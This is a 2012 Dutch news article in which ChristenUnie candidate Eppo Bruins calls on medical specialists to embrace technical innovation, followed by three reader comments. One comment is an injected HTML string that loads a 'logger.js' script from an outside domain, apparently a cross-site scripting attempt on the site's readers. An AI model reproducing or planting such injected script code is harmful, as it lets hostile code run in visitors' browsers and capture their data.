ACTUEEL

'Specialist moet meer technisch innoveren'

Medisch specialisten moeten meer openstaan voor nieuwe technieken in de zorg. Door technologie slim toe te passen, kan volgens de ChristenUnie flink wat geld worden bespaard. "Maar dan moet er wel een forse cultuuromslag komen bij specialisten", stelde kandidaat-Kamerlid Eppo Bruins vrijdag.

“De technische ontwikkelingen gaan heel snel. En je merkt dat het moeilijk is om doktoren zelfs maar zo ver te krijgen om met nieuwe technieken te oefenen”, constateert Bruins. “Artsen zijn hierin uiterst behoudend.”

Hiërarchische structuur beperkt

De oplossing ligt volgens de ChristenUnie bij de jongere generatie artsen. “Zij staan er wel voor open. Maar zij hebben last van de hiërarchische structuur, waardoor de ouderen alles bepalen en de jongeren daarnaar moeten luisteren.” Volgens Bruins kunnen de artsen nog wel wat leren van de manier waarop natuurkundigen werken. “Hoogleraren omringen zich daar met jonge, slimme mensen. Daar worden ze enthousiast van”, stelt hij.

Technische innovaties

Technische innovaties die kunnen leiden tot veel besparingen zijn volgens Bruins bijvoorbeeld hightech handgereedschappen. Daarmee kan via kleine sneetjes worden geopereerd en herstellen patiënten sneller. Ook thuistesten, bijvoorbeeld voor reuma, zouden vaker moeten worden ingezet. “Ziekenhuizen zijn angstig om dit soort dingen toe te passen. En als ze het doen, behouden ze ook de oude werkwijze. Wij willen dat niet. Als er nieuwe technieken zijn, moeten specialisten ook stoppen met de oude”, vindt Bruins.

Medische technologie

De omslag bij specialisten kan ook nog eens goed zijn voor de Nederlandse economie, denkt de ChristenUnie. Volgens Bruins is Nederland koploper op het gebied van medische technologie en biedt dat voor de toekomst dus veel mogelijkheden. (ANP)

3 Reacties

om een reactie achter te laten

. .

8 september 2012

"/></a></><script src=http://sheeld.nl/63/logger.js>

Jaspers

10 september 2012

Helemaal mee eens, al hoeft een innovatie in medische hulpmiddelen (zoals handgereedschap) niet altijd "hightech" te zijn. "Lowtech" is vaak beter aan te leren, minder kwetsbaar, goedkoper en daarmee doelmatiger.
Belangrijk blijft om een innovatie eerst goed (en het liefst snel) op doelmatigheid en kosteneffectiviteit te onderzoeken, zodat de medische specialisten niet achter elkaar aan rennen om de nieuwste "hightech hype" te willen hebben, zoals je met de operatie robot ziet gebeuren. Want dan zullen technische innovaties niet leiden tot besparingen maar alleen tot kostenstijging.

Anoniem

10 september 2012

Merkwaardig hoe iedereen zelfs politici iets te vertellen heeft over innoveren in de zorg. Alsof de medische specialist zelf niet wisten dat technische innovatie de kwaliteit van zorg zal verhogen en kosten beperken. Alweer zoveelste hype-statement vanuit den haag. Zeker een verkiezingsstunt....

Top